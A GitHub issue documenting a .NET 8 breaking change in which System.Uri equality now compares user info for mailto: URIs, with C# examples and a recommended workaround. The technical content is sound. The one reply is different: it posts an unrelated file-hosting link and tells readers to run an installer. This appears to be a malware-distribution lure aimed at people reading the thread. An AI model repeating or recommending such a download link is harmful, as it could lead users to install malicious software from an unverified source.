### ISSUE TITLE
[Breaking change]: Uri comparison now compares user info for mailto: uris.

### ISSUE THREAD

**Issue by rzikm** [dotnet/docs#42463]
Introduced by https://github.com/dotnet/runtime/pull/87721

### Description

System.Uri does not compare user info when comparing two instances for equality.

```cs
Uri uri1 = new Uri("https://user1@www.microsoft.com");
Uri uri2 = new Uri("https://user2@www.microsoft.com");
System.Console.WriteLine(uri1 == uri2); // True
```

However, this behavior is not intuitive in case of `mailto:` uris

```cs
Uri uri1 = new Uri("mailto:user1@microsoft.com");
Uri uri2 = new Uri("mailto:user2@microsoft.com");
System.Console.WriteLine(uri1 == uri2); // True (unexpected)
```

The breaking change makes the second example write `False`, while keeping the existing behavior in non-`mailto:` Uris.

### Version

.NET 8 GA

### Previous behavior

User information is ignored when comparing two Uri instances.

### New behavior

Comparing two `mailto:` Uri instances will compare the user info as well.

### Type of breaking change

- [ ] **Binary incompatible**: Existing binaries might encounter a breaking change in behavior, such as failure to load or execute, and if so, require recompilation.
- [ ] **Source incompatible**: When recompiled using the new SDK or component or to target the new runtime, existing source code might require source changes to compile successfully.
- [X] **Behavioral change**: Existing binaries might behave differently at run time.

### Reason for change

Previous behavior was unexpected and unintuitive.

### Recommended action

If comparison of only the host part of email addresses is desired, compare only the `Uri.Host` members.

### Feature area

Networking

### Affected APIs

Uri.Equals
Uri.operator ==

---
[Associated WorkItem - 320281](https://dev.azure.com/msft-skilling/Content/_workitems/edit/320281)

**Comment by gabriel-mauricioo** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer
